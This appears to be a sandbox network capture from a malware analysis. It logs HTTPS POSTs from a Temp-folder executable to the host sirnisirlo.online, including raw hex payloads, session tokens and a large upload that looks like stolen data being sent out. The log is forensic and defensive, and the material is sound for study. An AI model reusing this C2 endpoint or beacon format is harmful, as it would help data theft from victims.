2024-11-14 18:58:28 UTC	338	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Content-Length: 96 Host: sirnisirlo.online
2024-11-14 18:58:28 UTC	96	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 00 fe ff ff ff 2d 00 00 00 00 00 00 00 00 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
2024-11-14 18:58:29 UTC	807	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 18:58:29 GMT Transfer-Encoding: chunked Connection: close sid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ai4ydDJzps2%2FyYyUzsPKjLnc8avm7MyJzP9eZCzWxG95Dqt03F3mUtiIDdQooNZrtjS8qkxoB6LPxLeNQENh4FxA5b8AvtOtmPivWnzzKU%2Ft3V%2FT%2FYAjandGAufdeaINxZJoAw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293bb12b08db4f-NRT alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=131019&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1070&delivery_rate=22110&cwnd=32&unsent_bytes=0&cid=5236fe96ddf2724f&ts=885&x=0"
2024-11-14 18:58:29 UTC	1369	IN	Data Raw: 33 37 64 35 0d 0a 1c c5 01 01 6a 7a 00 00 00 00 00 00 00 00 00 00 14 00 5c 08 62 04 20 00 cb 08 62 04 17 15 09 03 04 b5 e6 cb 72 11 a7 37 74 99 99 3c 9c fc da f4 d2 b6 da c0 c0 d2 f0 a0 9c fc da f4 d2 58 b6 da c0 c0 d2 f0 58 be f0 c6 fc da d6 d2 14 00 5d 0b dd 03 0a 00 cb 08 dd 03 17 15 09 03 04 b5 e6 cb 72 11 a7 37 74 99 99 3c 80 c6 d6 ca c4 58 90 da f0 da 14 00 13 0d 89 09 06 00 cb 08 89 09 17 15 09 03 04 b5 b7 cb 72 11 a7 37 74 99 99 3c 96 f2 da fc d0 da 10 00 56 0b e7 03 04 00 b7 04 e7 03 17 15 09 03 04 b5 40 b7 f9 5d 91 89 4a 0e 03 79 10 00 38 06 46 0c 04 00 b7 04 46 0c 17 15 09 03 04 b5 b7 b7 da ac 6d 44 69 ff ff b4 10 00 52 08 0c 0f 04 00 b7 04 0c 0f 17 15 09 03 04 b5 40 b7 67 b5 9a ee d4 e6 08 1e 14 00 6b 0a 3c 0d 12 00 cb 08 3c 0d 17 15 09 03 04 Data Ascii: 37d5jz\b br7t<XX]r7t<Xr7t<V@]Jy8FFmDiR@gk<<
2024-11-14 18:58:29 UTC	1369	IN	Data Raw: 57 21 87 77 a7 14 00 85 0d 93 06 0d 00 cb 08 93 06 17 15 09 03 04 b5 e6 cb 72 11 a7 37 74 99 99 3c 80 c6 de da c0 58 be f0 c6 fc da d6 d2 14 00 46 0d 30 03 1a 00 cb 08 30 03 17 15 09 03 04 b5 e7 cb 72 11 a7 37 74 99 99 3c f4 c4 de a0 bc d2 da c0 b4 84 9e a0 de c0 ca d2 c4 f0 a0 9a f8 f8 90 da f0 da 14 00 bb 02 42 02 19 00 cb 08 42 02 17 15 09 03 04 b5 98 cb 72 11 a7 37 74 99 99 3c 94 ca c0 d2 ac ca c0 c0 da a0 fe ca f0 d2 c2 da c4 da d6 d2 fc 44 e8 c2 c0 14 00 7c 02 73 04 04 00 cb 08 73 04 17 15 09 03 04 b5 b7 cb 72 11 a7 37 74 99 99 3c 4c 44 d0 dc 10 00 94 00 71 0a 04 00 b7 04 71 0a 17 15 09 03 04 b5 31 b7 04 85 cc ad b7 d6 5e 5d 14 00 d4 06 94 03 05 00 cb 08 94 03 17 15 09 03 04 b5 31 cb 72 11 a7 37 74 99 99 3c 4c 44 ca c4 ca 14 00 d8 07 f3 07 0b 00 cb Data Ascii: W!wr7t<XF00r7t<BBr7t<D\|ssr7t<LDqq1^]1r7t<LD
2024-11-14 18:58:29 UTC	1369	IN	Data Raw: 07 17 15 09 03 04 b5 07 b6 11 5a 7e ac 1f af f9 32 22 5c b6 11 03 5d 5c 2d 14 00 b5 00 70 02 0c 00 cb 08 70 02 17 15 09 03 04 b5 e7 cb 72 11 a7 37 74 99 99 3c f2 c0 f0 fc da f4 c4 de 44 ca c4 ca 14 00 ee 0e e7 06 08 00 b6 08 e7 06 17 15 09 03 04 b5 e7 b6 fa 54 e8 c3 ed ee 95 17 cc 52 20 7e f1 1c 30 08 14 00 be 08 5d 02 08 00 b6 08 5d 02 17 15 09 03 04 b5 31 b6 cf bf bb 70 dc b8 ef 7a fc b9 73 cd c0 4a 4a 65 10 00 5c 02 8b 07 04 00 b7 04 8b 07 17 15 09 03 04 b5 40 b7 0b 50 2b fa b8 03 b9 0a 14 00 c7 01 40 0f 08 00 b6 08 40 0f 17 15 09 03 04 b5 31 b6 fe 8a 39 c2 7a f8 b7 1c cc 8c f1 7f 66 0a 12 03 14 00 e8 07 f5 0e 1f 00 cb 08 f5 0e 17 15 09 03 04 b5 98 cb 72 11 a7 37 74 99 99 3c d4 f0 f8 a0 94 ca c0 d2 ac ca c0 c0 da a0 fc d2 de d2 c4 f0 fe d2 fc f4 d2 fc Data Ascii: Z~2"\]\-ppr7t<DTR ~0]]1pzsJJe\@P+@@19zfr7t<
2024-11-14 18:58:29 UTC	1369	IN	Data Raw: 79 c7 9f 54 ce 94 0d a4 10 00 fd 08 2e 06 04 00 b7 04 2e 06 17 15 09 03 04 b5 b7 b7 1c e7 08 fe ae b4 9a 0e 14 00 70 0c a4 00 08 00 b6 08 a4 00 17 15 09 03 04 b5 07 b6 49 05 09 db 3b 08 43 ff 7f 03 c1 66 27 fa e6 e0 14 00 96 09 53 0c 09 00 cb 08 53 0c 17 15 09 03 04 b5 40 cb 72 11 a7 37 74 99 99 3c f2 fe d2 fc 44 de c6 c4 d4 10 00 e9 0e 14 0c 04 00 b7 04 14 0c 17 15 09 03 04 b5 31 b7 dd 0d 7f ab 6a 5e ed 5b 10 00 31 04 f5 0d 04 00 b7 04 f5 0d 17 15 09 03 04 b5 b7 b7 93 8f b3 1e 21 d8 21 ee 10 00 49 07 7d 06 04 00 b7 04 7d 06 17 15 09 03 04 b5 b7 b7 3b ea 0d 48 88 b9 9f b8 14 00 cd 01 d6 09 09 00 cb 08 d6 09 17 15 09 03 04 b5 b7 cb 72 11 a7 37 74 99 99 3c ec d2 fc c6 de c6 c4 d4 4c 14 00 ff 01 60 08 08 00 b6 08 60 08 17 15 09 03 04 b5 3b b6 e8 37 85 ea cd Data Ascii: yT..pI;Cf'SS@r7t<D1j^[1!!I}};Hr7t<L``;7
2024-11-14 18:58:29 UTC	1369	IN	Data Raw: 08 11 00 17 15 09 03 04 b5 07 cb 72 11 a7 37 74 99 99 3c dc fc da f4 d2 44 d2 e8 d2 10 00 10 05 06 02 04 00 b7 04 06 02 17 15 09 03 04 b5 b7 b7 c4 2b 51 d5 77 78 c3 25 10 00 45 0d 4f 07 04 00 b7 04 4f 07 17 15 09 03 04 b5 07 b7 bf 62 05 6e 1e 44 7f ac 14 00 54 00 4f 09 11 00 cb 08 4f 09 17 15 09 03 04 b5 e6 cb 72 11 a7 37 74 99 99 3c de c8 fc c6 c2 ca f2 c2 a6 dc fc c6 f6 fe d2 fc fe 14 00 be 05 29 0d 08 00 cb 08 29 0d 17 15 09 03 04 b5 b7 cb 72 11 a7 37 74 99 99 3c dc c0 ce d0 da f0 da 4c 14 00 79 0f 69 01 07 00 cb 08 69 01 17 15 09 03 04 b5 e6 cb 72 11 a7 37 74 99 99 3c 90 d2 d4 da f2 c0 f0 14 00 af 03 49 0d 11 00 cb 08 49 0d 17 15 09 03 04 b5 e7 cb 72 11 a7 37 74 99 99 3c be 86 94 b0 b6 9a bc 92 a0 b0 ca d6 c8 f0 b4 84 9e 10 00 79 0e be 01 04 00 b7 04 Data Ascii: r7t<D+Qwx%EOObnDTOOr7t<))r7t<Lyiir7t<IIr7t<y
2024-11-14 18:58:29 UTC	1369	IN	Data Raw: 09 03 04 b5 e7 b6 7c e4 e3 06 5f d3 13 b4 4a e2 2b bb 43 21 b6 ab 14 00 9a 0e 6f 02 01 00 cb 08 6f 02 17 15 09 03 04 b5 05 cb 72 11 a7 37 74 99 99 3c fe 10 00 c9 04 bc 0a 04 00 b7 04 bc 0a 17 15 09 03 04 b5 e7 b7 88 fa fc c4 b2 ba 6e 34 14 00 22 07 c2 01 08 00 b6 08 c2 01 17 15 09 03 04 b5 e7 b6 ca fd 07 1e 2b 02 50 7a fc fb cf a3 37 f0 f5 65 14 00 0d 08 3c 07 1b 00 cb 08 3c 07 17 15 09 03 04 b5 b7 cb 72 11 a7 37 74 99 99 3c be c6 d4 f0 f6 da fc d2 a0 9c ca f0 de c6 ca c4 a0 9c ca f0 de c6 ca c4 42 ba f0 10 00 cf 03 0d 06 04 00 b7 04 0d 06 17 15 09 03 04 b5 e7 b7 ff 2c 8a 31 4c 7f 18 c1 14 00 88 02 a7 0a 08 00 b6 08 a7 0a 17 15 09 03 04 b5 b7 b6 b9 2d 2d ff d1 ea 18 ff 8f 2b e5 42 cd 18 bd e0 14 00 26 04 2f 03 08 00 b6 08 2f 03 17 15 09 03 04 b5 3b b6 33 Data Ascii: \|_J+C!oor7t<n4"+Pz7e<<r7t<B,1L--+B&//;3
2024-11-14 18:58:29 UTC	1369	IN	Data Raw: b8 58 b8 da fe fe f6 c6 fc d0 14 00 26 0c 25 04 08 00 b6 08 25 04 17 15 09 03 04 b5 31 b6 f9 f0 ef fa 8f 09 58 ac cf f6 27 47 93 fb fd b3 14 00 cf 06 fd 03 13 00 cb 08 fd 03 17 15 09 03 04 b5 07 cb 72 11 a7 37 74 99 99 3c 74 7a 74 68 68 6a 70 68 6a 7a 7e 7e 74 72 7a 68 72 68 7e 10 00 a4 07 68 0e 04 00 b7 04 68 0e 17 15 09 03 04 b5 31 b7 aa 73 fe 7f 19 20 6c 8f 14 00 4a 0a 4a 09 10 00 cb 08 4a 09 17 15 09 03 04 b5 e7 cb 72 11 a7 37 74 99 99 3c be 86 94 b0 b6 9a bc 92 a0 bc d2 da c0 b4 84 9e 14 00 d7 05 8b 08 14 00 cb 08 8b 08 17 15 09 03 04 b5 40 cb 72 11 a7 37 74 99 99 3c de c6 c4 c4 d2 de f0 ca c6 c4 a6 f0 fc da de d2 44 f0 e8 f0 14 00 ce 09 f0 05 05 00 cb 08 f0 05 17 15 09 03 04 b5 05 cb 72 11 a7 37 74 99 99 3c 4c 44 c0 c6 d6 14 00 88 03 e2 00 07 00 cb Data Ascii: X&%%1X'Gr7t<tzthhjphjz~~trzhrh~hh1s lJJJr7t<@r7t<Dr7t<LD
2024-11-14 18:58:29 UTC	1369	IN	Data Raw: 99 99 3c b8 da de ce da d6 d2 fe a0 82 ca de fc c6 fe c6 d4 f0 44 86 f2 f0 c0 c6 c6 ce 94 c6 fc b6 ca c4 d0 c6 f6 fe a6 68 f6 d2 ce ea dc 7e d0 68 dc dc f6 d2 14 00 af 0a 50 0e 27 00 cb 08 50 0e 17 15 09 03 04 b5 e7 cb 72 11 a7 37 74 99 99 3c bc d2 da c0 b4 84 9e a0 f4 c4 de f4 ca d2 f6 d2 fc 44 d0 a0 f8 da fe fe f6 c6 fc d0 fe 44 d2 c4 de c2 da fe f0 d2 fc 14 00 7e 03 27 0a 0e 00 cb 08 27 0a 17 15 09 03 04 b5 3b cb 72 11 a7 37 74 99 99 3c de c6 c6 ce ca d2 fe 44 fe fa c0 ca f0 d2 14 00 4e 04 33 09 08 00 cb 08 33 09 17 15 09 03 04 b5 e6 cb 72 11 a7 37 74 99 99 3c b6 d2 dc 58 90 da f0 da 14 00 99 00 ac 0d 07 00 cb 08 ac 0d 17 15 09 03 04 b5 e6 cb 72 11 a7 37 74 99 99 3c b8 fc c6 d4 ca c0 d2 14 00 90 03 7d 03 16 00 cb 08 7d 03 17 15 09 03 04 b5 05 cb 72 11 Data Ascii: <Dh~hP'Pr7t<DD~'';r7t<DN33r7t<Xr7t<}}r
2024-11-14 18:58:29 UTC	1369	IN	Data Raw: 99 99 3c fe d2 f0 f0 ca c4 d6 fe 44 d0 da f0 14 00 09 09 e7 08 16 00 cb 08 e7 08 17 15 09 03 04 b5 05 cb 72 11 a7 37 74 99 99 3c b0 d2 c0 d2 d6 fc da c2 58 90 d2 fe ce f0 c6 f8 a0 f0 d0 da f0 da 10 00 b8 0b 87 05 04 00 b7 04 87 05 17 15 09 03 04 b5 57 b7 b5 b7 21 e4 07 e0 b3 14 14 00 15 0c 5d 0e 0d 00 cb 08 5d 0e 17 15 09 03 04 b5 31 cb 72 11 a7 37 74 99 99 3c 4c 44 f0 e8 f0 44 de c6 fc fc f2 f8 f0 10 00 48 0e 7c 0a 04 00 b7 04 7c 0a 17 15 09 03 04 b5 b7 b7 45 c8 52 7f f6 9b c0 8f 14 00 4a 0b 6d 04 58 00 cb 08 6d 04 17 15 09 03 04 b5 31 cb 72 11 a7 37 74 99 99 3c be c6 d4 f0 f6 da fc d2 a0 82 ca de fc c6 fe c6 d4 f0 a0 86 d4 d4 ca de d2 a0 7a 74 44 78 a0 86 f2 f0 c0 c6 c6 ce a0 b8 fc c6 d4 ca c0 d2 fe a0 86 f2 f0 c0 c6 c6 ce a0 6a 7e 76 72 9e 94 94 78 70 Data Ascii: <Dr7t<XW!]]1r7t<LDDH\|\|ERJmXm1r7t<ztDxj~vrxp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	58021	188.114.96.3	443	4032	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:58:30 UTC	417	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 53 Host: sirnisirlo.online
2024-11-14 18:58:30 UTC	53	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 03 fe ff ff ff 02 00 00 00 00 00 00 00 00 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-11-14 18:58:31 UTC	723	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 18:58:31 GMT Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bo77cyXimncyHMTJMl05sfhFFRwJ1Fxa22ETomDXhY8Smg1i9O5eVYOAKzQqih6JbZ3YY3EjEv4XZ0HgWx7YW65YtE%2BNokNCrC510v5V4dMVnregzGCOzPvCWhqKwLlPC0xJpg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293bbded262500-SJC alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=39388&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1106&delivery_rate=73262&cwnd=32&unsent_bytes=0&cid=7d72135316bf8521&ts=584&x=0"
2024-11-14 18:58:31 UTC	84	IN	Data Raw: 34 65 0d 0a fe ff ff ff 3e 00 00 00 00 00 00 00 00 00 00 00 91 9c ce 14 a1 ae 02 ce 0c 85 56 de ce 17 fd e1 44 ce 22 c7 31 38 ce 26 75 b6 d6 ce 03 d0 c6 1f ce 29 c4 8a b7 ce 22 7f cf 0c ce 02 03 ca 2b ce 04 73 90 21 ce 3e 9c 99 b4 ce 37 d1 d4 f3 0d 0a Data Ascii: 4e>VD"18&u)"+s!>7
2024-11-14 18:58:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	58022	188.114.96.3	443	4032	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:58:31 UTC	418	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 208 Host: sirnisirlo.online
2024-11-14 18:58:31 UTC	208	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 62 55 18 22 95 00 00 00 88 00 00 00 08 00 00 00 72 3b 04 fa 7a 9d 99 3c dc b2 28 5c 1e 18 18 18 18 18 18 18 18 18 18 18 3d 99 39 dc b2 28 5c dc 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 14 40 18 18 18 18 18 18 18 42 18 42 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 16 18 18 18 18 18 18 18 18 18 18 18 18 1a 18 18 18 b8 8e 12 14 18 18 18 18 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 18 18 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: bU"r;z<(\=9(\@BB
2024-11-14 18:58:32 UTC	712	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:58:32 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=goWqCOBxitfIqCi1R7w%2B%2F5E2di0unP91%2BfItGtgVdOlfCAXaiNq7nEWxXoA3VGocH3gPUFMhzFB1DeZVJ1CEi1ar2gVtu%2Fr6eo5YeqzsGxdNxg2UVICs58xBt3TC5%2BikF5148w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293bc63d53e651-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=22553&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1262&delivery_rate=128011&cwnd=32&unsent_bytes=0&cid=bc3f22fe42fe90e3&ts=426&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	58023	188.114.96.3	443	4032	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:58:34 UTC	421	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 681457 Host: sirnisirlo.online
2024-11-14 18:58:34 UTC	15331	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 5c 46 f3 15 35 10 0a 00 88 00 00 00 08 00 00 00 72 3b 04 fa 7a 9d 99 3c a0 94 ff 32 18 1e 18 18 18 18 18 18 18 18 18 18 3f 99 39 3d 29 99 39 55 9e c8 fc c6 c2 d2 ab 72 9e 6c a0 b2 fe d2 fc fe a0 c8 f2 dc d2 fc f0 a0 9a f8 f8 90 da f0 da a0 80 c6 de da c0 a0 96 c6 c6 d6 c0 d2 a0 9e c8 fc c6 c2 d2 a0 b2 fe d2 fc 58 90 da f0 da 3b 2b 99 39 57 90 d2 d4 da f2 c0 f0 ab 62 9e 6c a0 b2 fe d2 fc fe a0 c8 f2 dc d2 fc f0 a0 9a f8 f8 90 da f0 da a0 80 c6 de da c0 a0 96 c6 c6 d6 c0 d2 a0 9e c8 fc c6 c2 d2 a0 b2 fe d2 fc 58 90 da f0 da a0 90 d2 d4 da f2 c0 f0 ab 70 de c8 fc c6 c2 ca f2 c2 a6 dc fc c6 f6 fe d2 fc fe a0 9e c8 fc c6 c2 d2 a0 f8 fc c6 d4 ca c0 d2 fe a0 90 d2 d4 da f2 c0 f0 a0 80 c6 d6 ca c4 58 90 da Data Ascii: \F5r;z<2?9=)9UrlX;+9WblXpX
2024-11-14 18:58:34 UTC	15331	OUT	Data Raw: 8e ce f8 f2 c4 8c 72 f2 f8 76 b2 f8 92 c4 84 c2 86 9e f2 aa 86 ea de fa 9c fc 8c 8e 4e c2 96 f6 ac ac b8 f6 86 70 68 70 d2 fe 96 b4 82 da 4e 90 78 7e 9a 78 7e 8c ba f4 86 e8 b2 8a c2 9c da b4 88 fc 8e dc dc aa 9c 7c b2 cc c8 94 96 9c d4 dc 96 78 8c 88 9a 7e cc d6 d6 8e fc 9a 7e 9a b2 c2 86 ba f6 c6 f2 70 96 da ec 9c 6a e8 ec f2 fe 46 68 72 88 c2 78 8a 46 dc d2 88 f0 be f0 70 82 c6 be f4 ba f6 d4 86 ec 8c 72 4e 8e be 8e d4 be bc 6a f0 aa c2 ec 90 70 da b4 f0 7a 7c 8e c0 b4 da d2 68 9e f0 f0 b4 86 82 8a 92 b4 ba 74 88 fa fc fe bc ec 72 c8 46 de b4 cc ea dc 94 aa 86 96 4e be ba c0 7c 9c de 88 70 84 7c 86 be ea 88 96 c2 7a 70 b6 c8 7e f8 c4 82 9a 8e dc f6 ea f8 f8 76 ec f8 78 ca c0 b6 76 d6 6a b4 8a 9e 82 7e 70 7a 7a ca 96 80 74 f2 d6 72 bc b0 b8 46 dc 8a aa Data Ascii: rvNphpNx~x~\|x~~pjFhrxFprNjpz\|htrFN\|p\|zp~vxvj~pzztrF
2024-11-14 18:58:34 UTC	15331	OUT	Data Raw: 9a d4 9e 9e a8 ec ba ec de 6a c6 8c ba ca 70 74 ac 7a 74 7e ba 94 dc 88 92 bc 8e c8 c6 de c8 bc c6 ba 94 6a 6a f2 ba 6a ba 68 8a 74 88 8e 70 b0 bc 76 8e 80 b0 90 ea ea b0 7e 72 d2 7e d6 ea f2 86 96 c8 c8 80 f4 b0 c2 f4 b6 c6 c6 74 ec 78 b2 b8 9c 86 68 9c 74 f4 68 7e 6a 94 8c 76 70 94 fa 6a 7e 92 b2 82 8c 92 ca c8 9c d6 c6 68 ea 9e 88 8c 9c d6 c6 68 e8 9e b8 8c 9c d6 fc fe ac 9c 8a b2 d6 f6 b0 78 82 d6 c2 8e ba 70 86 82 82 d6 fe 92 d6 f6 be de aa 9c 8e b2 d6 f6 be de ac 9c 92 84 9c d6 ce 4e 72 9c 90 f4 9c c8 c6 74 ca 82 ce 96 8e d2 7a ce b2 c0 9e 76 f4 aa 7a 94 ba ea f4 f6 78 ca 70 80 be 72 f4 78 fe 9e ce fa d0 90 76 9a c6 8e 88 7a 4e c8 ce b4 9c 8e d4 be f4 b6 bc be b2 bc cc 46 80 c6 fa 9c b2 4e cc ce b6 9c da a8 b0 ec ec 82 c6 94 92 fa c4 a8 7c 9c bc b2 Data Ascii: jptzt~jjjhtpv~r~txhth~jvpj~hhxpNrtzvzxprxvzNFN\|
2024-11-14 18:58:34 UTC	15331	OUT	Data Raw: 46 fc 82 f8 80 aa 7c b2 e8 de 94 68 c0 9c dc b2 74 f2 b6 ac ba be ac fa 9a fc 6a be f8 de 4e 96 9e 88 88 88 be f8 b8 ba d2 b6 72 fa b8 7a 92 9a 80 b6 7e c4 c8 f2 46 b2 9c c2 c6 6a 70 fa 70 68 fe 8e fe 7c 9e fc dc 6a 9e 72 a8 8a 82 7a ea 68 b2 f8 d6 f4 d4 de 70 fc 9c d2 fa 8a 70 aa da fc da 78 a8 8e f0 c2 bc 8a c0 7e d6 74 f4 88 d4 bc 74 c4 c6 dc ce 7a c2 b4 f6 d2 c4 ac ea de bc ac ce 46 7e 7c d4 b2 ca 70 8e cc ba b0 70 f2 b2 90 c2 f2 d2 b2 d6 fc 6a c0 94 e8 88 86 86 76 fe 9e 96 70 de 6a c2 f0 ca ec ce c8 7c b0 da ea b8 c8 dc fe c2 72 fe aa b0 76 4e 86 e8 f0 46 8e fe 7a de f8 e8 be 9c de 4e f4 ac a8 fe aa f2 bc 9a 86 8e ce 7c fa 78 f8 80 fc ce b8 e8 d4 9c 82 72 da 9c b0 b8 46 92 fa b0 92 aa ec a8 74 76 ca ca f4 9a da 92 ce b8 6a c4 ea 9c 74 7e 96 86 92 70 Data Ascii: F\|htjNrz~Fjpph\|jrzhppx~ttzF~\|ppjvpj\|rvNFzN\|xrFtvjt~p
2024-11-14 18:58:34 UTC	15331	OUT	Data Raw: 76 7a aa 8a 7c 6a d6 7e 7c 9c f2 76 4e cc aa f2 fc 82 d6 aa 96 a8 dc f2 aa b4 c8 e8 4e 68 c8 86 4e 7e da 96 94 be 76 ba de 96 fe 88 d6 ea 74 b4 76 ea 86 76 94 c6 f6 c0 46 ba a8 d0 b6 80 b2 a8 8a fa c4 fa fc fc 72 7a 46 84 8a cc c8 94 9a b8 82 ac 7a c0 74 f4 ca ca 80 86 9a 94 fa 88 ec ca b0 8a ec 6a ba 46 7a ac c8 86 f4 46 70 d4 f8 46 f2 b8 70 d4 fc f4 4e 88 74 46 46 c8 4e c4 4e 70 46 c8 4e f2 46 70 d4 fc 46 4e 88 74 d4 76 cc 4e 88 74 76 46 c8 4e f4 46 70 d4 f8 46 f2 b8 70 d4 fc f4 4e 88 74 46 46 c8 4e c4 4e 70 46 c8 4e f2 46 70 d4 fc 46 4e 88 74 d4 76 cc 4e f4 f6 c4 b6 46 f6 f0 fe 46 d0 6a f6 8a be f0 68 e8 78 76 ea 96 94 70 f6 9a 8e a8 ba 88 c6 9c 8e 88 f8 f4 b0 94 8e ce e8 c0 c8 c6 ec 8c c6 74 94 be 96 ce a8 7c de 74 68 76 be ac b0 f6 72 96 bc d0 7e 76 Data Ascii: vz\|j~\|vNNhN~vtvvFrzFztjFzFpFpNtFFNNpFNFpFNtvNtvFNFpFpNtFFNNpFNFpFNtvNFFjhxvpt\|thvr~v
2024-11-14 18:58:34 UTC	15331	OUT	Data Raw: d4 7e ca 78 aa b8 e8 46 d4 9a bc e8 82 7c 9c 82 de cc 90 4e d0 94 82 b0 ca 8e ce 76 c4 9e ac a8 46 fe ce 90 82 68 c6 f0 94 c6 ce ea c6 c2 9e 92 fc ca ba 74 72 ec b2 b2 84 c2 46 dc 90 70 c6 bc 8c 88 96 7c ec c6 b8 da cc 9c d0 cc 80 82 7e dc 74 ba 8a bc c0 92 ca fe 6a 8e 86 88 da 92 b0 74 dc de de ca b8 70 b0 f8 de dc 92 be 86 7e 7e 8a bc f6 ea ca 8c 86 88 8c e8 d6 92 f8 6a 92 ca c6 b4 fa 9a da 46 8a 94 ac 8c aa f4 aa c6 7c c4 7c fa 84 96 bc b2 46 c4 7e 92 84 be 68 b6 cc aa c6 94 96 d6 78 b0 90 70 ca f2 f8 7c 96 88 e8 9e c4 68 b8 c4 f4 b6 80 f2 ce d4 c8 9c f2 46 9e c0 7e 84 d0 86 9c 86 96 96 4e ec 9c c8 e8 76 86 c8 78 9a 8e d6 fc 76 d6 cc ac b6 b0 f8 f0 7a 68 dc c2 82 b4 92 d0 9e 84 b4 de cc 8e dc da e8 c8 f4 80 8e ba f0 7e 72 8a 7c cc c0 8c ba ce ec d6 76 Data Ascii: ~xF\|NvFhtrFp\|~tjtp~~jF\|\|F~hxp\|hF~Nvxvzh~r\|v
